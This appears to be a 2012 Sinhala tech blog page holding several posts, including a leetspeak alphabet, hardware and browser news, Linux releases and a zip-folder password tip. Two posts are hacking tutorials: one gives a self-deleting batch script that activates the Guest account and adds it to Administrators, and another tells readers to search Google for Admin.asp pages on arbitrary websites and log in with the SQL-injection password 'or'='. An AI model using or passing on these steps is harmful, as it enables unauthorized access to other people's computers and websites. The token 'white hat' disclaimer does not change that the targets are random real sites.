Tuesday, October 30, 2012

හැකර්ස්ලගෙ භාෂාව ඉගෙන ගමු!!


ඔන්න අද මම ඔයාලට කියලා දෙන්න යන්නෙ හැකර් කෙනෙක් වෙන්නෙ කොහොමද කියලා එකට ඉස්සෙල්ලාම එගොල්ලො භාවිතා කරන භාෂාව ඉගෙන ගන්න ඔනෙ මෙ ලිපියෙන් ඔයලට එගෑන ඉගෙන ගන්න පුලුවන්
ඉස්සෙල්ලාම එගොල්ලො භාවිතා කරන හොඩිය ඉගෙන ගමු



A = 4, /-\, @, ^, /\ , //-\\, ci

B = 8, ]3, ]8, |3, |8, ]]3, 13

C = (, { , [[, <, €

D = ), [}, |), |}, |>, [>, ]]), Ð

E = 3, ii, €

F = |=,(=, ]]=, ph

G = 6, 9, (_>, [[6, &

H = #, |-|, (-), )-(, }{, }-{, {-}, /-/, \-\, |~|, []-[], ]]-[[

I = 1, !, |, ][, []

J = _|, u|, ;_[], ;_[[

K = |<, |{, ][<, ]]<, []<

L = |,1, |_, []_, ][_, £

M = /\/\, |\/|, [\/], (\/), /V\, []V[], \\\, (T), ^^, .\\, //., ][\\//][,

N = /\/, |\|, (\), /|/, [\], {\}, ][\][, []\[], ~

O = 0, (), [], <>, *, [[]]

P = |D, |*, |>, []D, ][D

Q = commas are necessary: (,) or 0, or O, or O\ or []\

R = |2, |?, |-, ]]2 []2 ][2

S = 5, $

T = 7, +, ']‘, 7`, ~|~, -|-, ‘][', "|", †

U = (_), |_|, \_\, /_/, \_/, []_[], ]_[, µ

V = \/ , \\//

W = \/\/, |/\|, [/\], (/\), VV, ///, \^/, \\/\//, 1/\/, \/1/, 1/1/

X = ><, }{, )(, }[

Y = ‘/, %, `/, \j , “//, ¥, j, \|/, -/

Z = 2, z, 7_,`/_



මෙ තියෙන්න ඉන්ග්‍රිසි හොඩිය එගොල්ලො භාවිත කරන සන්කෙතත් සමගය

හෑකර්ස් ලා ගොඩාක් භාවිත කරන වචන කෙටි යෙදුම් සමග පහත දෑක්වෙ



A = @
B = |3
C = (
D = |)
E = 3
F = |=
G = 6
H = |-|
I = |
J = _|
K = |(
L = |_
M = /\/\
N = /\/
O = 0
P = |*
Q = 0,
R = |2
S = $
T = 7
U = |_|
V = \/
W = \/\/
X = )(
Y = ‘/
Z = 2 a = 4
b = 8
c = ©
d = |>
e = 3
f = #
g = 9
h = h
i = |
j = j
k = |<
l = 1
m = m
n = n
p = |*
q = 0.
r = ®
s = 5
t = +
u = 00
v = \/
w = \/\/
x = ><
y = j
z = 2 at = @
ck = x0r
the = teh
you = j00 or u
own = pwn
ck = x0r
programs = progz
god = r00t
fool = f00
heart/love = <3
what’s up = sup
that = dat
look at = peep
kill = frag
sweet = schweet
sleep = reboot
greater than = >
newbie = n00b
no = noes
woo hoo = w00t
why = y
be = b
are = r
dude = d00d
fear = ph34r
and = &
super = uber blah/me = meh
yo = j0
rock = r0xx0r
hacker = h4x0r
cool = k3wl
software = warez
computer = pu73r
chick = chix0r
good = teh win
bad = teh lose
loser = l4m3r
aol = uh, 14m3r
money = monies
bye = bai
kick = punt
porn = pr0n
skill = m4d 5killz
hello = ping
robot = b0t
naked = n3k3d
what = wut
whatever = wutev
cool = c00
to/two = 2
with = wit
sex = cyb3r
 මෙකට කෑමතිනම් කමෙන්ට් එකකින් කියන්නකො එහෙනම් අපි ගියා :පි

Read more »

Saturday, October 27, 2012

Touch Screen ගැන ඔබ නොදන්නා දේ

සමහර ස්පර්ශ සංවේදී තිර සහිත ජංගම දුරකථන මිලෙන් අධික කුමන් හේතුවක් නිසාදැයි ඔබට සිතුනාද? ඔබ අත්වැස්ම් යොදා ස්පර්ශ සංවේදී තිරය ස්පර්ශ කරන විට එය ක්‍රියාත්මක නොවන්නේ ඇයිදැයි ඔබ සිතුවාද? ඇත්තෙන්ම බොහෝදෙනා නොදන්නා කාරණයක් තමයි ස්පර්ශ සංවේදී තිර නිපදවන තාක්ෂණයන් කිහිපයක් තිබෙන බව. පහතින් දැක්වෙන්නේ ස්පර්ශ සංවේදී තිර පිළිබඳ සංක්ෂිප්ත සටහනකි.

Read more »

Thursday, October 25, 2012

Guest ඉදන් Administrator Account එකක් Hack කරමු


පළමුව notepad එක open  කර ගන්න.
මේ codes ටික copy & paste කරන්න note pad එකට.
echo off
  title Please wait...
  cls
  net user add Username Password /add
  net user localgroup Administrators Username /add
  net user Guest 420 /active:yes
  net localgroup Guests Guest /DELETE
  net localgroup Administrators Guest /add
  del %0 

ඊළගට  Guest2admin.bat  කියන නමින් save කරන්න . 
Run කරන්න.


Read more »

Tuesday, October 9, 2012

Torch Browser - Torrent Client, Video Downloader, Sharing Tool, Download Accelerator හැමදේම එකම Browser එකකින්



අන්තර්ජාලයෙහි ප්‍රධාන කොටස මෙන්ම ජනප්‍රියම කොටස වන World Wide Web (WWW) භාවිතයට නම් අප විසින් සපුරාලිය යුතු ප්‍රධානම පහසුකමක් වන්නේ වෙබ් පිටු පරිශීලනය අවශ්‍ය වන Web Browser එක. ටීම් බර්නස්ලි විසින් ලොව ප්‍රථම Web Browser එක නිර්මාණය කරලීමෙන් අනතුරුව, විවිද සමාගම් ඔස්සේ විවිදාකාරයේ Web Browser ලොකයාට තිලිණ වුණි. මේ අතර වර්ථමානයේ ලොව අංක එකේ Web Browser එක විදිහට කිරුලු පලදිනු බලන්නේ Google සමාගමෙන් නිපදවනු ලැබූ Chromium Web Browser එකයි. මෙය Free And Open Source මෘදුකාංගයක් වන අතර, ඕනෑම කෙනෙකුට වැඩි දියුණු කිරීමේ අවසරය ලැබී තිබෙනවා. මෙම Chromium Web Browser එකෙහි ප්‍රධාන කේත සටහන උපයෝගී කරගනිමින් මීට ටික කලකට ඉහතදී Comodo සමාගම විසින් තව Browser එකක් එලි දක්වනු ලැබුවා Comodo Dragon යන මිනින්. වර්ථමානයේ Browser යුද්ධය තව තවත් අලුත් කරමින්, මීට පෙර පැවති කිසිදු Browser එකක් සතු පහසුකම් අභිභවා යමින් Torch Media සමාගම විසින් Web Browser එකක් පසුගියදා එලිදක්වනු ලැබුවා. මෙය නම් කර තිබෙන්නේ Torch Browser ලෙසටය. මෙහ මීට පෙර පරිගණකය තුලට වෙනමම Install කරගත යුතුව තිබුණු Application Software සතු ගුණාංග Web Browser එක තුලටම ඇතුලත් කරමින් නව ආරක Web Browser එකක් ලොකයාට එලිදක්වා තිබේ.

අප විසින් අන්තර්ජාල භාවිතයේදී එහි ඇතුලත් විශේෂාංග අත්විදීම සදහා Browser එක යොදාගත්තත් මේවාහයෙහි ඇතුලත් ඇතැම් පහසුකම් ලබාගැනීමට Additional Program අප පරිගණකයේ Install කරගැනීමට අවශ්‍ය වනවා. ඔබ යම් වේබ් පිටුවක සැරි සරන විට එහි ඇතුලත් Video එකක් ඔබගේ පරිගණකයට Download කරගැනීමට අවශ්‍ය නම්, ඒ සදහා විශේෂයෙන් සැකසු Video Downloader Program එකක් ඔබ පරිගණකයේ Install කර තිබිය යුතුයි. එසේති නැතිනම් Download Accelerator එකක් භාවිත කල යුතුයි. ඒ වගේම Torrent File වර්ථමානයේ නැතුවම බැරි දෙයකි. වාණිජ ලෝකෙ තිබෙන බොහෝ දේවල් අපි මුදල් නොගෙවා ලබාගන්නේ Torrent සේවාව හරහාය. මෙම Torrent Download කරගැනීමට නම් අප විසින් Torrent Client (Bit Torrent හෝ Utorrent) අප පරිගණකයේ Install කරගත යුතුයි. ඒ වගේම මෙහිදී අපට අමතරව Sharing පහසුකමක් හිමිවේ. මේ නිසාවෙන් ඔබගේ Facebook සහ Twitter මිතුරන් අතරේ විවිද දෑ බෙදා ගැනීමට බොහෙවින් උපකාරී වේවි. මෙය Chromium-Based Browsers එකක් නිසාවෙන් Web Browsing, Google Chrome Web Browser එක වගේම කාර්යක්ෂම වේ. මෙයට Google Chrome Web Store එකෙහි පවතින සියලුම Extension Install කරගැනීමට පුළුවන් වීමට වඩාත් පහසුයි. මන්ද Web Store එකෙහි පවතින Extension අපට ගොඩක් වැගත් වන නිසාවෙනි. පහතින් තිබෙන්නේ මෙම Web Browser එකයි.



මෙම Web Browser එකට Theme යොදාගෙන ඔබට අවශ්‍ය ආකාරයට හැඩකරවා ගන්නටද පුළුවන. පහල පිංතූරයෙන් ඔබට දක්නට ලැබෙන්නේ මෙහි ඇතුලත් Built-in Torrent Client එකයි. එමගින් පහසුවෙන් සහ වේගයෙන් එකම තැනකදි හැමදේම කරගන්න පුලුවනි.
මේ ආකාරයේ පහසුකම් රැසකින් සමන්විත මෙම නව Web Browser එකහි නව අත්දැකීම විදිනන්ට ඔබත් කැමැති ඇති. එසේනම් පහලින් Download කර, ඔබගේ පරිගණකයේ Install කරගන්න. මීට පෙර සේ විවිද Additional Program ඔබේ පරිගණකයට Install කරගැනීමේ අවශ්‍යතායක් ඇති නොවේවි,මෙම Web Browser එක භාවිත කිරීමට ඔබත් හුරු උනොතින්. පහල බට්න් එක ක්ලික් කර, මෙය Download කරගන්න. 



Read more »

DDR4 (Double Data Rate) RAM Coming soon!!! දෙගුණයකට වැඩි දත්ත හුවමාරු වේගයක්



පරිගණක පද්ධතියක් තුල හුවමාරු වන දත්තයන් තාවකාලිකව රදවා තබා ගන්නේ RAM මතකය තුලයි. මෙම RAM නැමති කුඩා කොටස තුල ගිගාබයිට් ගණනක දත්තයන් තැම්පත් කළ හැකිආකාරයට වර්ථමාණයේ දියුණු වී ඇත. පෙර පැවති SD RAM සිට DDR RAM දක්නා තාක්ෂණය දියුණු වීමෙන් අනතුරුව DDR 2 සහ DDR 3 ලෙසට දියුණු කරන ලදි. වර්ථමාණයේ බොහෝ පරිගණක පද්ධති වල දැකගැනීමට හැකිවන්නේ DDR 3 RAM තාක්ෂණයයි. මෙය මිලෙන් අඩු වීම, ඵලදායිතාවය, සුලභතාවය නිසා මෙම තාක්ෂණය ලෝකයා අතර විශාල ලෙස ජනප්‍රිය විය. වර්ථමානයේ පවතින DDR3 තාක්ෂණයද පැරණි තාක්ෂණයක් බවට පත් කරලමින් DDR4 තාක්ෂණය හදුන්වා දීමට සැම්සුන් සමාගම සහ මයිකෝන් සමාගම සූදානමින් පසුවෙයි. මීට පෙර පැවති DDR 2 සහ DDR 3 RAM තාක්ෂණය හදුන්වා දුන්නේද ප්‍රභල පරිගණක නිෂ්පාධනය සමාගමක් වන සැම්සුන් සමාගමයි.

මීට පෙර වසරේදී සැම්සුන් සමාගම විසින් ප්‍රකාශයට පත් කර තිබුනේ ඔවුන් විසින් 2012 වසර අවසානයේදී පමණ DDR4 තාක්ෂණය රැගත් RAM පත් හදුන්වා දෙන බවටයි. ඒ වගේම මෙම වසරේදී මම බලාපොරොත්තුව තව තවත් අලුත් කරමින් රැම් නිෂ්පාධණ ක්ෂේත්‍රෙය් සුප්‍රසිද්ධ සමාගමක් වන මයිකෝන් (Micron) සමගම ප්‍රකාශයට පත් කර තිබෙන්නේ ඔවුන්ගේ සමාගමෙන්ද DDR4 රැගත් RAM පත් මෙම වසර අවසානයේදී ලෝකයාට හදුන්වා දෙන බවයි. මේ අනුව කිව හැක්කේ වර්ෂ 2013 DDR4 තාක්ෂණය සනිටුහන් කරනු ඇති බවයි. 


  සැම්සුන් සමාගම විසින් DDR4 RAM තාක්ෂණය පිළිබවට අදහස් දක්වා තිබෙන්නේ පහත අකාරයටය. මෙම DDR4 තාක්ෂණයෙන් යුතු රැම් පත් DDR3 තාක්ෂණයෙන් යුතු වූ රැම් තාක්ෂණයට වඩා දෙගුණයක වේගවත්ව දත්ත හුමමාරු කිරීමට හැකියාවක් පවතී. මෙහි දැනට ලබාගෙන ඇති දත්ත හුවමාරු කිරීමේ වේගය 2.133Gbps වන අතර, මෙය ගිගාබයිට් 4 (4 Gbps) දක්වා දියුණු කල හැකි බව සැම්සුන් සමාගමේ පර්යේෂකයින් විසින් ප්‍රකාශ කර තිබේ. දැනට පවතින DDR3 තාක්ෂණය සදහා විදුලිය 1.5 V පමණ වැය වේ. එහෙත් මෙම නව DDR4 තාක්ෂණයේදී විදුලි පරිබෝජනය අඩු කරමින් 1.2 V විදුලි ධාරිතාවයක් මෙයට ලබාගනී. මේ නිසා DDR3 තාක්ෂණයට වඩා 40% ක විදුලි පිරිමැසුමක් ලබාගත හැකියි. මෙම DDR4 RAM සදහා Pseudo Open Drain (POD) තාක්ෂණයද භාවිත කර තිබේ. එමගින් දත්ත ලිවීමේදී හා කියවීමේදී DDR3 තාක්ෂණයට වඩා 50% ක් විදුලිය ඉතිරි කර් දීමට සමත් බවයි.
මයිකෝන් සමාගම විසින් නිෂ්පාධනය කරන DDR4 තාක්ෂණයෙන් යුතු RAM පත් පිළිබදව ඔවුන්ද අදහස් දක්වා තිබේ. 30nm තාක්ෂණය මත පදනම්ව නිර්මාණය කෙරෙන මෙම DDR4 මොඩියුලය නොයෙක් පරිගණක සදහා ගැලපෙන ආකාරයෙන් RDIMMs, LRDIMMs, 3DS, SODIMMs සහ UDIMMs ලෙස මාදිලි රැසකින් නිෂ්පාධනය කරනු බවයි. මෙහිදී තත්පරයට මෙගාබයිට් 2400ක් (2400 Mb/s) තරම් වූ විශාල දත්ත සම්ප්‍රේශණ වේගයකින් මෙය අන්තර්ගත වන අතර, මෙය ඉදිරියේදී 3200 Mb/s දක්වා දියුණු කිරීමට හැකි බව මයිකෝන් සමාගම විසින් ප්‍රකාශ කර තිබේ. මෙහිද සැම්සුන් සමාගමේ සේම විදුලි පරිබෝජනය 1.2V දක්වා අඩු කර තිබීම විශේෂයි. මේ නිසාවෙන් පරිගණක උපාංග සදහා වැය වන විදුලි ප්‍රමාණය සුළු වශයෙන් හෝ අඩුවේවි. 



වර්ථමාණයේ පවතින DDR3 RAM තාක්ෂණයේදී 512MB සිට 8 GB දක්වා පැවති මතක පැතහි ධාරිතාවය මෙම නව DDR4 මතක පතහි ධාරිතාවය 2GB සිට 16GB දක්වා වැඩිවී තිබේ. Clock Speed එක පෙරට වඩා දෙගුණ වී ඇති අතර උපරිම අගය 1600MHz ලෙස දක්වා තිබේ.

වර්ෂ 1997 දී SD තාක්ෂණයේ සිට DDR තාක්ෂණය කරා රැගෙන ආ සැම්සුන් සමාගම 2001 වර්ෂයේ දී DDR2 ද, 2005 වර්ෂයේදී DDR 3 RAM ද ලෝකයාට හදුන්වා දුනි. 2012 වර්ෂයේදී DDR4 RAM හදුන්වා දීමට සැම්සුන් සමාගම සේවා මයික්‍රෝන් සමාගමත්, සැම්සුන් සමාගමත් සූදානමින්. මෙම තාක්ෂණයන් ලොකයට හදුන්වා දුන්නත් අප සතු පරිගණක පද්ධති සදහා එකතු වීමට නම් අවම වසර එකක් හෝ දෙකක් ගතවේවී. RAM නිෂ්පාධයෙන් අනතුරුව ඒ හා ගැලපෙන පරිගණක මව්පුවරු නිෂ්පාධනය කල යුතුයි. ඒ මගේම මම DDR4 තාක්ෂණයෙන් යුතු රැම් පත් ඉදිරියේදි ටැබ්ලට් පී.සී සහ ජංගම දුරකථන සඳහාද නිෂ්පාධනය කරන බව ඔවුන් ප්‍රකාශයට පත්කර තිබේ. මේ අනුව අනාගත ලෝතේ දත්ත හුවමාරු වේගය සේම තාවකාලික මතකයද වර්ථමානයට වඩා බොහෝ සෙයින් වැඩි වේවි. එහෙත් මිල ගනන් ගැන තාම තොරතුරුක් නැහැ. 

ඔන්න මම ගියා..වැදගත් උන කියල හිතෙනවනම් cඔම්මෙන්ට් එකක් දාල යන්න,,ටටා...


Read more »

Tuesday, September 25, 2012

කිසිම SOFTWARE එකක් USE කරන්නෙ නැතුව FOLDER එකකට PASSWORD එකක් දාගන්න විදිහක් තමයි මේ..


1. ඔයාට password එකක් දාගන්න ඕනි folder එක උඩ right click කරල, "Send To" option එකේ "Compressed (zipped) Folder" click කරන්න.
**වැදගත්: Folder එක Empty වෙන්න බෑ..

2. දැන් අලුතින්, කලින් folder එකේ නමින්ම "compressed zipped folder" එකක් හැදෙයි.

3. මේ අලුතින් හැදුනු "compressed zipped folder" එක උඩ double click කරන්න.
ඔයලට පෙනෙයි ඔයලගෙ orginal folder එක මේක ඇතුලෙ තියෙනව.

4. දැන් උඩ වම් කෙලවරේ තියෙන "File" menu එකට ගිහින් "Add a password" option එක click කරන්න.

5. දැන් එතන ඔයාල කැමති password එකක් දෙන්න.

**වැදගත්: ඔයාලගෙ original folder එක delete කරන්න.

**ඔයලාට ඕන්නම් මේ file එක hide කරගන්න,

මේ file එක උඩ right click කරල "Properties" select කරල,
යටින් තියෙන "Hidden" option එක select කරල OK කරන්න.
ආයෙ ඔයලට visible කරගන්න ඔනෙ උනාම,
1. My Computer -> Tools -> Folder Options ගිහින් (Windows 7 වල නම් My Computer -> Organize -> Folder and search options ගිහින්),
"View" tab එක click කරන්න.

2. එකෙ එන list එකෙන් Hidden files and folders යටතෙ තියෙන "Show hidden files and folders" select කරන්න. (ආයෙ invisible කරගන්න ඔනෙ නම් මෙතනින් "Do not show hidden files and folders" select කරන්න)
Read more »

පුංචිම පුංචි පරිඝණක මෙහෙයුම් පද්ධතිය නොමිලේම DOWNLOAD කරගන්න- SLITAZ


SliTaz(Simple Light Incredible Temporary Autonomous Zone) කියන්නෙ Linux පාදක පුංචි මෙහෙයුම් පද්ධතියක්. Size එක 30MB. මේක ස්ථාපනය කරන්න අවශ්්‍යය වෙන්නෙ 100MB වගේ ඉඩක් තමයි.







Overview

Root filesystem taking up about 100 MB and ISO image of less than 30 MB.
Ready to use Web server powered by LightTPD with CGI and PHP support.
Browse the Web with Midori or Retawq in text mode.
Sound support provided by Alsa mixer, audio player and CD ripper/encoder.
Chat, mail and FTP clients.
SSH client and server powered by Dropbear.
Database engine with SQLite.
Generate a LiveUSB device.
Tools to create, edit or burn CD or DVD images.
Elegant desktop with Openbox running on the top of Xorg/Xvesa (X server).
Homemade graphical boxes to command line utilities.
2300 packages easily installable from the mirror.
Active and friendly community.



SliTaz official website එකට ගිහින් SliTaz download කරගන්න මෙතන කොටන්න.

Read more »

Wednesday, August 15, 2012

Thursday, August 9, 2012

UBUNTU 12.10 (QUANTAL QUETZAL) ALPHA 3 අලුත්ම වශන් 1ක



උබුන්ටු වල මිට ඉහතදි දුන්නා මතකයි නෙ අලුත් වශන් 1කක් නෙ මෙන්න එහෙනම් උබුන්ටු වල අලුත්ම වශන 1මට හම්බුනා මෙක එයලා නම් කරලා තියෙන්නෙ Ubuntu 12.10 (Quantal Quetzal) Alpha 3  යන නමින්,.,.


Ubuntu development team released Ubuntu 12.10 (Quantal Quetzal) Alpha 3, it available for download 
this is 3rd alpha release of Ubuntu 12.10 development. this is last alpha of development cycle.

ඔන්න දෙන්න යන්නෙ පොඩි හැදින්විමක් පහලින් බලා ගන්නකො.....


whats new : 

Linux 3.5 kernel 
GNOME 3.5.4
Unity 6 desktop interface
revamped Session Indicator 
updated Date and Time Indicator
Mozilla Firefox 15.0 Beta 
breOffice 3.6 RC2 
Third party driver install interface instead of jockey 
and many bug fixes 
if you are exited and want to taste new alpha then download from below links :


ඔන්න එහෙනම් පහලින් බා ගන්න..........
Download link 


32 Bit 1ක මෙන්න



64 Bit 1ක මෙන්න 



Read more »

Saturday, August 4, 2012

වෙබ් අඩවියක් HACK කරීම


මේක උබලට දෙන්නේ කවුරුවත් අපහසුතාවයට පත් කරන්න නම් නෙමේ..එක නිසා Hack කල වගෙ නෙමේ ඒ අයගේ දත්ත වලට හානියක් කරන්න එප..ඉගෙන ගැනිමට පමණයි... තේරුම් ගනිල්ලා..



Hacking  කියන්නේ පරිගණකය අන්තර්ජාලය භාවිතා කරන බොහෝදෙනා වැඩි නැඹුරැතාවයක් දක්වන දෙයක්. මේ හැක් කිරීම් ලෝකයේ හොද දේවල් සදහා මෙන්ම වැරදි දෙවල් සදහාත් යොදාගන්නවා. 


      බොහෝ දෙනෙකුගේ ඉල්ලීම පරිදි පොඩි පොඩි හැකින්ග් ටිප්ස් ටිකක් දාන්නයි හදන්නේ. හැබැයි මේවා පාවිච්චි කරන්න.ඒත් Black Hat Hacker කෙනෙක් නොවී White Hat Hacker කෙනෙක් වෙන්න.


මුලින්ම වෙබ් අඩවියක් හැක් කරන සරල දේකට බහිමු. ඕනෙම සයිට් එකකට ඇඩ්මින් කෙනෙක් ඉන්නවා කියල ඔයාල දන්නවානේ.එයා අතේ තමයි ඒ සයිට් එකේ යූසර් නේම් පාස්වර්ඩ් තියෙන්නේ.ඉතින් අපි කරන්න යනේ ඇඩ්මින්ගේ පාස්වර්ඩ් එක දීල ඇඩ්මින් විදියට සයිට් එකට ලොග් වෙන්න. අපි තෝරගන්නේ .ඒ එස් පී කියන පිටුයි. 


ගූගල් වල සර්ච් කරන්න  Admin.asp


දැන් තමන් කැමති ලින්ක් එකක් ඕපන් කරගන්න


දැන් ලොග් ඉන් මෙනු එකක් ලැබිල ඇති.


යූසර් නේම් එකට Admin
පාස්ර්ඩ් එකට    'or' '='


ඇතුල් කරල ලොග් ඉන් වෙන්න. අනිවාරයෙන්ම ඇඩ්මින් ලෙස ඔබ‍ට එම සයිට් එකට ඇතුල් වීමට ඉඩ ලැබෙනු ඇත.


* මේ සයිට් වල තිබෙන යම් යම් දත්ත විරෑපී කිරීම නොකරන්න.මන්ද යත් එය තවත් අයෙකුට කරදරයක්.අපහසුතාවයක් වියහැකියි.*
Read more »